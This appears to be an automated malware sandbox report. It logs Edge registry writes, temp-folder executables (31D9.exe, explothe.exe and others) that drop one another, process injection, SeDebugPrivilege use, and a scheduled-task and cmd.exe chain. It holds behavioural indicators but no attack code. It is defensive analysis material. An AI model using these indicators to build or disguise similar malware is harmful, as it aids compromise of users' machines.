Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5964c754ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{B4E2D972-4660-4544-A030-4455D1705662} = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a591856bff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 747c1b6fff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3264 wrote to memory of 1316 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\31D9.exe
PID 3264 wrote to memory of 1316 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\31D9.exe
PID 3264 wrote to memory of 1316 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\31D9.exe
PID 3264 wrote to memory of 2176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3303.exe
PID 3264 wrote to memory of 2176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3303.exe
PID 3264 wrote to memory of 2176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3303.exe
PID 1316 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\31D9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 1316 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\31D9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 1316 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\31D9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3264 wrote to memory of 1080 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3264 wrote to memory of 1080 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2956 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2956 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 3264 wrote to memory of 2684 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\34AA.exe
PID 3264 wrote to memory of 2684 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\34AA.exe
PID 3264 wrote to memory of 2684 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\34AA.exe
PID 228 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 228 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 228 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 3264 wrote to memory of 3716 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3567.exe
PID 3264 wrote to memory of 3716 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3567.exe
PID 3264 wrote to memory of 3716 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3567.exe
PID 2740 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2740 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2740 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 3264 wrote to memory of 4988 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3652.exe
PID 3264 wrote to memory of 4988 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3652.exe
PID 3264 wrote to memory of 4988 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3652.exe
PID 4220 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 4220 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 4220 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 4988 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\3652.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4988 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\3652.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4988 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\3652.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 236 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 236 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 236 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 236 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 236 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 236 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 4172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 4172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
